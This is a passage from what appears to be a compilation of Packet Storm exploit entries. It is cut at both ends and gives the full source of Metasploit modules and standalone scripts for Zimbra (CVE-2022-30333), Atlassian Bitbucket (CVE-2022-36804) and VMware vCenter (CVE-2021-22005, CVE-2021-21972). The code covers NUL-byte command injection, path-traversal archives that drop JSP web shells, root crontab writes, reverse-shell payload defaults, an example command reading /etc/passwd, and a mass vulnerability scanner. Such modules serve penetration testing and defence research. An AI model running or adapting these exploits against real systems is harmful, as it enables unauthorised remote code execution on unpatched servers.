Patch 24 (and earlier) \n* Zimbra Collaboration 8.8.15 Patch 31 (and earlier) \n}, \n'Author' => [ \n'Simon Scannell', # Discovery / initial disclosure (via Sonar) \n'Ron Bowes', # Analysis, PoC, and module \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-30333'], \n['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'], \n['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'], \n['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'], \n], \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [ \n[ 'Zimbra Collaboration Suite', {} ] \n], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', \n'TARGET_PATH' => 
'../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/', \n'TARGET_FILENAME' => nil, \n'DisablePayloadHandler' => false, \n'RPORT' => 443, \n'SSL' => true \n}, \n'Stance' => Msf::Exploit::Stance::Passive, \n'DefaultTarget' => 0, \n'Privileged' => false, \n'DisclosureDate' => '2022-06-28', \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']), \n \n# Separating the path, filename, and extension allows us to randomize the filename \nOptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']), \nOptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']), \n] \n) \n \nregister_advanced_options( \n[ \nOptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']), \nOptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]), \n \n# Took this from multi/handler \nOptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]), \nOptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ]) \n] \n) \nend \n \n# Generate an on-system filename using datastore options \ndef generate_target_filename \nif datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp') \nprint_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?') \nend \n \nFile.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\") \nend \n \n# Normalize the path traversal and figure out where it is relative to the 
```ruby
# web root
def zimbra_get_public_path(target_filename)
  # Normalize the path
  normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath

  # Figure out where it is, relative to the webroot
  webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')
  relative_path = normalized_path.relative_path_from(webroot)

  # Hopefully, we found a path from the webroot to the payload!
  if relative_path.to_s.start_with?('../')
    return nil
  end

  relative_path
end

def exploit
  print_status('Encoding the payload as a .jsp file')
  payload = Msf::Util::EXE.to_jsp(generate_payload_exe)

  # Create a file
  target_filename = generate_target_filename
  print_status("Target filename: #{target_filename}")

  begin
    rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)
  rescue StandardError => e
    fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")
  end

  file_create(rar)

  print_good('File created! Email the file above to any user on the target Zimbra server')

  # Bail if they don't want the payload triggered
  return unless datastore['TRIGGER_PAYLOAD']

  # Get the public path for triggering the vulnerability, terminate if we
  # can't figure it out
  public_filename = zimbra_get_public_path(target_filename)
  if public_filename.nil?
    print_warning('Could not determine the public web path, disabling payload triggering')
    return
  end

  register_file_for_cleanup(target_filename)

  interval = datastore['CheckInterval'].to_i
  print_status("Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...")

  # This loop is mostly from `multi/handler`
  stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i
  timeout = datastore['ListenerTimeout'].to_i
  loop do
    break if session_created?
    break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(public_filename)
    )

    unless res
      fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')
    end

    Rex::ThreadSafe.sleep(interval)
  end
end
end
```

CVSS v2 score 5.0, vector AV:N/AC:L/Au:N/C:N/I:P/A:N. Source file: [zimbra_unrar_cve_2022_30333.rb](<https://packetstormsecurity.com/files/download/167989/zimbra_unrar_cve_2022_30333.rb.txt>).

## [Bitbucket Git Command Injection](<https://packetstormsecurity.com/files/168470/Bitbucket-Git-Command-Injection.html>)

Packet Storm exploit entry PACKETSTORM:168470, published 2022-09-22, for CVE-2022-36804. CVSS v3.1 base score 8.8 (High), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H; no CVSS v2 score recorded. Source file: [bitbucket_git_cmd_injection.rb](<https://packetstormsecurity.com/files/download/168470/bitbucket_git_cmd_injection.rb.txt>).

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Bitbucket Git Command Injection',
        'Description' => %q{
          Various versions of Bitbucket Server and Data Center are vulnerable to
          an unauthenticated command injection vulnerability in multiple API endpoints.

          The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
          creates an archive of the repository, leveraging the `git-archive` command to do so.
          Supplying NULL bytes to the request enables the passing of additional arguments to the
          command, ultimately enabling execution of arbitrary commands.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'TheGrandPew', # discovery
          'Ron Bowes', # analysis and PoC
          'Jang', # testanull - PoC
          'Shelby Pace' # Metasploit module
        ],
        'References' => [
          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],
          [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],
          [ 'CVE', '2022-36804' ]
        ],
        'Platform' => [ 'linux' ],
        'Privileged' => false,
        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
        'Targets' => [
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Type' => :linux_dropper,
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'CmdStagerFlavor' => %w[wget curl bourne],
              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Type' => :unix_cmd,
              'Arch' => ARCH_CMD,
              'Payload' => { 'BadChars' => %(:/?#[]@) },
              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }
            }
          ]
        ],
        'DisclosureDate' => '2022-08-24',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ IOC_IN_LOGS ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(7990),
        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),
        OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),
        OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])
      ]
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'keep_cookies' => true,
      'uri' => normalize_uri(target_uri.path, 'login')
    )

    return CheckCode::Unknown('Failed to receive response from application') unless res

    unless res.body.include?('Bitbucket')
      return CheckCode::Safe('Target does not appear to be Bitbucket')
    end

    footer = res.get_html_document&.at('footer')
    return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer

    version_str = footer.at('span')&.children&.text
    return CheckCode::Detected('Cannot find version string in footer') unless version_str

    matches = version_str.match(/v(\d+\.\d+\.\d+)/)
    return CheckCode::Detected('Version unknown') unless matches && matches.length > 1

    version_str = matches[1]
    vprint_status("Found Bitbucket version: #{matches[1]}")

    num_vers = Rex::Version.new(version_str)
    return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')

    major, minor, revision = version_str.split('.')
    case major
    when '6'
      return CheckCode::Appears
    when '7'
      case minor
      when '6'
        return CheckCode::Appears if revision.to_i < 17
      when '17'
        return CheckCode::Appears if revision.to_i < 10
      when '21'
        return CheckCode::Appears if revision.to_i < 4
      end
    when '8'
      case minor
      when '0', '1'
        return CheckCode::Appears if revision.to_i < 3
      when '2'
        return CheckCode::Appears if revision.to_i < 2
      when '3'
        return CheckCode::Appears if revision.to_i < 1
      end
    end

    CheckCode::Detected
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def authenticate
    print_status("Attempting to authenticate with user '#{username}' and password '#{password}'")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'login'),
      'keep_cookies' => true
    )

    fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),
      'keep_cookies' => true,
      'vars_post' =>
      {
        'j_username' => username,
        'j_password' => password,
        'submit' => 'Log in'
      }
    )

    fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'dashboard'),
      'keep_cookies' => true
    )

    fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res

    unless res.body.include?('Your work') && res.body.include?('Projects')
      fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')
    end

    @authenticated = true
    print_good('Successfully logged into Bitbucket!')
  end

  def find_public_repo
    print_status('Searching Bitbucket for publicly accessible repository')
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),
      'keep_cookies' => true
    )

    fail_with(Failure::Disconnected, 'Did not receive a response') unless res
    json_data = JSON.parse(res.body)
    fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data

    unless json_data['size'] > 0
      fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')
    end

    # opt for public repos unless none exist.
    # Attempt to use a private repo if so
    repos = json_data['values']
    possible_repos = repos.select { |repo| repo['public'] == true }
    if possible_repos.empty? && @authenticated
      possible_repos = repos.select { |repo| repo['public'] == false }
    end

    fail_with(Failure::NotFound, 'There doesn\'t appear to be any repos to use') if possible_repos.empty?

    possible_repos.each do |repo|
      project = repo['project']
      next unless project

      @project = project['key']
      @repo = repo['slug']
      break if @project && @repo
    end

    fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo
    print_good("Found public repo '#{@repo}' in project '#{@project}'!")
  end

  def execute_command(cmd, _opts = {})
    uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')
    send_request_cgi(
      'method' => 'GET',
      'uri' => uri,
      'keep_cookies' => true,
      'vars_get' =>
      {
        'format' => 'zip',
        'path' => Rex::Text.rand_text_alpha(2..5),
        # NUL bytes split the prefix value into extra argv entries for git archive
        'prefix' => "#{Rex::Text.rand_text_alpha(1..3)}\x00--exec=`#{cmd}`\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}"
      }
    )
  end

  def exploit
    @authenticated = false
    authenticate unless username.blank? && password.blank?
    find_public_repo

    if target['Type'] == :linux_dropper
      execute_cmdstager(linemax: 6000)
    else
      execute_command(payload.encoded)
    end
  end
end
```

## [Bitbucket 7.0.0 Remote Command Execution](<https://packetstormsecurity.com/files/171453/Bitbucket-7.0.0-Remote-Command-Execution.html>)

Packet Storm exploit entry PACKETSTORM:171453, published 2023-03-24, for CVE-2022-36804. CVSS v3.1 base score 8.8 (High), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H; no CVSS v2 score recorded. Source file: [bitbucket700-exec.txt](<https://packetstormsecurity.com/files/download/171453/bitbucket700-exec.txt>).

```python
# Exploit Title: Bitbucket v7.0.0 - RCE
# Date: 09-23-2022
# Exploit Author: khal4n1
# Vendor Homepage: https://github.com/khal4n1
# Tested on: Kali and ubuntu LTS 22.04
# CVE : cve-2022-36804

#****************************************************************#
# The following exploit is used to exploit a vulnerability present in
# Atlassian Bitbucket Server and Data Center 7.0.0 before version
# 7.6.17, from version 7.7.0 before version 7.17.10, from version
# 7.18.0 before version 7.21.4, from version 8.0.0 before version
# 8.0.3, from version 8.1.0 before version 8.1.3, and from version
# 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1

# Usage Example

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'

# The server will send a 500 http response with the stdout output from the
# command executed.


#****************************************************************#

#!/usr/bin/python3

import argparse
import urllib.error
import urllib.parse
from urllib import request
import re

# argument setup
parser = argparse.ArgumentParser(description='Program to test bitbucket vulnerability CVE-2022-36804')
parser.add_argument("--url", help="Set the target to attack. [REQUIRED]", required=True)
parser.add_argument("--cmd", help="Set the command to execute. [DEFAULT ID]", required=True, default='id')
args = parser.parse_args()
cmd = urllib.parse.quote(args.cmd)


# reads from the public repository what is available
requ = request.urlopen(args.url + "/repos?visibility=public")
response = requ.read()

# select a public project and store it in a variable
project = re.findall('7990/projects/(.*)/repos/',
                     str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]

# Selects a public repo and stores it in a variable
file = re.findall('/repos/(.*)/browse',
                  str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]

# Exploitation
try:
    attack = request.urlopen(args.url +
                             "/rest/api/latest/projects/" + project + "/repos/" + file +
                             "/archive?prefix=ax%00--exec=%60" + cmd + "%60%00--remote=origin")
    print(attack.read().decode())
except urllib.error.HTTPError as e:
    body = e.read().decode()  # Read the body of the error response
    print(body)
```

## [VMware vCenter Server Analytics (CEIP) Service File Upload](<https://packetstormsecurity.com/files/164439/VMware-vCenter-Server-Analytics-CEIP-Service-File-Upload.html>)

Packet Storm exploit entry PACKETSTORM:164439, published 2021-10-07, for CVE-2021-22005. CVSS v2 score 7.5, vector AV:N/AC:L/Au:N/C:P/I:P/A:P; no CVSS v3 score recorded. Source file: [vmware_vcenter_analytics_file_upload.rb](<https://packetstormsecurity.com/files/download/164439/vmware_vcenter_analytics_file_upload.rb.txt>).

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',
        'Description' => %q{
          This module exploits a file upload in VMware vCenter Server's
          analytics/telemetry (CEIP) service to write a system crontab and
          execute shell commands as the root user.

          Note that CEIP must be enabled for the target to be exploitable by
          this module. CEIP is enabled by default.
        },
        'Author' => [
          'George Noseevich', # Discovery
          'Sergey Gerasimov', # Discovery
          'VMware', # Initial PoC
          'Derek Abdine', # Analysis
          'wvu' # Analysis and exploit
        ],
        'References' => [
          ['CVE', '2021-22005'],
          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],
          ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],
          ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],
          ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']
        ],
        'DisclosureDate' => '2021-09-21',
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'WfsDelay' => 60
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),
      'vars_get' => {
        '_c' => ''
      }
    )

    return CheckCode::Unknown unless res

    unless res.code == 200 && res.body == '"FULL"'
      return CheckCode::Safe('CEIP is not fully enabled.')
    end

    CheckCode::Appears('CEIP is fully enabled.')
  end

  def exploit
    print_status('Creating path traversal')

    unless write_file(rand_text_alphanumeric(8..16))
      fail_with(Failure::NotVulnerable, 'Failed to create path traversal')
    end

    print_good('Successfully created path traversal')

    print_status("Executing #{payload_instance.refname} (#{target.name})")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end

    print_warning("Please wait up to #{wfs_delay} seconds for a session")
  end

  def execute_command(cmd, _opts = {})
    print_status("Writing system crontab: #{crontab_path}")

    crontab_file = crontab(cmd)
    vprint_line(crontab_file)

    unless write_file("../../../../../../etc/cron.d/#{crontab_name}", crontab_file)
      fail_with(Failure::PayloadFailed, 'Failed to write system crontab')
    end

    print_good('Successfully wrote system crontab')
  end

  def write_file(path, data = nil)
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),
      'ctype' => 'application/json',
      'vars_get' => {
        '_c' => '',
        '_i' => "/#{path}"
      },
      'data' => data
    )

    return false unless res&.code == 201

    true
  end

  def crontab(cmd)
    # https://man7.org/linux/man-pages/man5/crontab.5.html
    <<~CRONTAB.strip
      * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/
      * * * * * root #{cmd}
    CRONTAB
  end

  def crontab_path
    "/etc/cron.d/#{crontab_name}.json"
  end

  def crontab_name
    @crontab_name ||= rand_text_alphanumeric(8..16)
  end

end
```

## [VMware vCenter 6.5 / 7.0 Remote Code Execution Proof Of Concept](<https://packetstormsecurity.com/files/161527/VMware-vCenter-6.5-7.0-Remote-Code-Execution-Proof-Of-Concept.html>)

Packet Storm exploit entry PACKETSTORM:161527, published 2021-02-24, for CVE-2021-21972. No CVSS score recorded. Source file: [CVE-2021-21972.py](<https://packetstormsecurity.com/files/download/161527/CVE-2021-21972.py.txt>). The script is a mass checker only: it treats an HTTP 405 on an unauthenticated GET to the `uploadova` endpoint as vulnerable, and writes hits to a file. Its Chinese output strings are translated below.

```python
#-*- coding:utf-8 -*-
banner = """
888888ba dP
88 `8b 88
a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
88 `8b. 88' `88 88 Y8ooooo. 88 88
88 .88 88. .88 88 88 88. .88
88888888P `88888P8 dP `88888P' `88888P'
ooooooooooooooooooooooooooooooooooooooooooooooooooooo
@time:2021/02/24 CVE-2021-21972.py
C0de by NebulabdSec - @batsu
"""
print(banner)

import threadpool
import random
import requests
import argparse
import http.client
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"

def get_ua():
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

    ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
    )
    return ua

def CVE_2021_21972(url):
    # "scoks5" is not a URL scheme, so requests ignores this entry and no proxy is used
    proxies = {"scoks5": "http://127.0.0.1:1081"}
    headers = {
        'User-Agent': get_ua(),
        "Content-Type": "application/x-www-form-urlencoded"
    }
    targetUrl = url + TARGET_URI
    try:
        res = requests.get(targetUrl,
                           headers=headers,
                           timeout=15,
                           verify=False,
                           proxies=proxies)
        # proxies={'socks5': 'http://127.0.0.1:1081'})
        # print(len(res.text))
        if res.status_code == 405:
            print("[+] URL:{}--------CVE-2021-21972 vulnerability present".format(url))
            # print("[+] Command success result: " + res.text + "\n")
            with open("vulnerable_urls.txt", 'a') as fw:
                fw.write(url + '\n')
        else:
            print("[-] " + url + " CVE-2021-21972 vulnerability not found.\n")
    # except Exception as e:
    #     print(e)
    except:
        print("[-] " + url + " Request ERROR.\n")

def multithreading(filename, pools=5):
    works = []
    with open(filename, "r") as f:
        for i in f:
            func_params = [i.rstrip("\n")]
            # func_params = [i] + [cmd]
            works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(CVE_2021_21972, works)
    [pool.putRequest(req) for req in reqs]
    pool.wait()

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u",
                        "--url",
                        help="Target URL; Example:http://ip:port")
    parser.add_argument("-f",
                        "--file",
                        help="Url File; Example:url.txt")
    # parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
    args = parser.parse_args()
    url = args.url
    # cmd = args.cmd
    file_path = args.file
    if url != None and file_path == None:
        CVE_2021_21972(url)
    elif url == None and file_path != None:
        multithreading(file_path, 10)  # default 15 threads (the call passes 10)

if __name__ == "__main__":
    main()
```

## [VMware vCenter Server File Upload / Remote Code Execution](<https://packetstormsecurity.com/files/161695/VMware-vCenter-Server-File-Upload-Remote-Code-Execution.html>)

Packet Storm exploit entry PACKETSTORM:161695, published 2021-03-08, for CVE-2021-21972. CVSS v2 score 10.0, vector AV:N/AC:L/Au:N/C:C/I:C/A:C; no CVSS v3 score recorded. Source file: [vmware_vcenter_uploadova_rce.rb](<https://packetstormsecurity.com/files/download/161695/vmware_vcenter_uploadova_rce.rb.txt>).

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  # "Shotgun" approach to writing JSP
  Rank = ManualRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::CheckModule
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE',
        'Description' => %q{
          This module exploits an unauthenticated OVA file upload and path
          traversal in VMware vCenter Server to write a JSP payload to a
          web-accessible directory.

          Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c.
          Note that later vulnerable versions of the Linux appliance aren't
          exploitable via the webshell technique. Furthermore, writing an SSH
          public key to /home/vsphere-ui/.ssh/authorized_keys works, but the
          user's non-existent password expires 90 days after install, rendering
          the technique nearly useless against production environments.

          You'll have the best luck targeting older versions of the Linux
          appliance. The Windows target should work ubiquitously.
        },
        'Author' => [
          'Mikhail Klyuchnikov', # Discovery
          'wvu', # Analysis and exploit
          'mr_me', # Co-conspirator
          'Viss' # Co-conspirator
        ],
        'References' => [
          ['CVE', '2021-21972'],
          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'],
          ['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'],
          ['URL', 'https://twitter.com/jas502n/status/1364810720261496843'],
          ['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'],
          ['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'],
          ['URL', 'https://kb.vmware.com/s/article/2143838'],
          ['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html']
        ],
        'DisclosureDate' => '2021-02-23', # Vendor advisory
        'License' => MSF_LICENSE,
        'Platform' => ['linux', 'win'],
        'Arch' => ARCH_JAVA,
        'Privileged' => false, # true on Windows
        'Targets' => [
          [
            # TODO: /home/vsphere-ui/.ssh/authorized_keys
            'VMware vCenter Server <= 6.7 Update 1b (Linux)',
            {
              'Platform' => 'linux'
            }
          ],
          [
            'VMware vCenter Server <= 6.7 Update 3j (Windows)',
            {
              'Platform' => 'win'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          'PAYLOAD' => 'java/jsp_shell_reverse_tcp',
          'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint']
        }
      )
    )

    register_options([
      Opt::RPORT(443),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])

    register_advanced_options([
      # /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index>
      OptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me
      OptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu
    ])
  end

  def spray_and_pray_min
    datastore['SprayAndPrayMin']
  end

  def spray_and_pray_max
    datastore['SprayAndPrayMax']
  end

  def spray_and_pray_range
    (spray_and_pray_min..spray_and_pray_max).to_a
  end

  def check
    # Run auxiliary/scanner/vmware/esx_fingerprint
    super

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus')
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check.')
    end

    case res.code
    when 200
      # {"States":"[]","Install Progress":"UNKNOWN","Config Progress":"UNKNOWN","Config Final Progress":"UNKNOWN","Install Final Progress":"UNKNOWN"}
      expected_keys = [
        'States',
        'Install Progress',
        'Install Final Progress',
        'Config Progress',
        'Config Final Progress'
      ]

      if (expected_keys & res.get_json_document.keys) == expected_keys
        return CheckCode::Vulnerable('Unauthenticated endpoint access granted.')
      end

      CheckCode::Detected('Target did not respond with expected keys.')
    when 401
      CheckCode::Safe('Unauthenticated endpoint access denied.')
    else
      CheckCode::Detected("Target responded with code #{res.code}.")
    end
  end

  def exploit
    upload_ova
    pop_thy_shell # ;)
  end

  def upload_ova
    print_status("Uploading OVA file: #{ova_filename}")

    multipart_form = Rex::MIME::Message.new
    multipart_form.add_part(
      generate_ova,
      'application/x-tar', # OVA is tar
      'binary',
      %(form-data; name="uploadFile"; filename="#{ova_filename}")
    )

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'),
      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
      'data' => multipart_form.to_s
    )

    unless res && res.code == 200 && res.body == 'SUCCESS'
      fail_with(Failure::NotVulnerable, 'Failed to upload OVA file')
    end

    register_files_for_cleanup(*jsp_paths)

    print_good('Successfully uploaded OVA file')
  end

  def pop_thy_shell
    jsp_uri =
      case target['Platform']
      when 'linux'
        normalize_uri(target_uri.path, "/ui/resources/#{jsp_filename}")
      when 'win'
        normalize_uri(target_uri.path, "/statsreport/#{jsp_filename}")
      end

    print_status("Requesting JSP payload: #{full_uri(jsp_uri)}")

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => jsp_uri
    )

    unless res && res.code == 200
      fail_with(Failure::PayloadFailed, 'Failed to request JSP payload')
    end

    print_good('Successfully requested JSP payload')
  end

  def generate_ova
    ova_file = StringIO.new

    # HACK: Spray JSP in the OVA and pray we get a shell...
    Rex::Tar::Writer.new(ova_file) do |tar|
      jsp_paths.each do |path|
        # /tmp/unicorn_ova_dir/../../<path>
        tar.add_file("../..#{path}", 0o644) { |jsp| jsp.write(payload.encoded) }
      end
    end

    ova_file.string
  end

  def jsp_paths
    case target['Platform']
    when 'linux'
      @jsp_paths ||= spray_and_pray_range.shuffle.map do |idx|
        "/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}"
      end
    when 'win'
      # Forward slashes work here
      ["/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}"]
    end
  end

  def ova_filename
    @ova_filename ||= "#{rand_text_alphanumeric(8..42)}.ova"
  end

  def jsp_filename
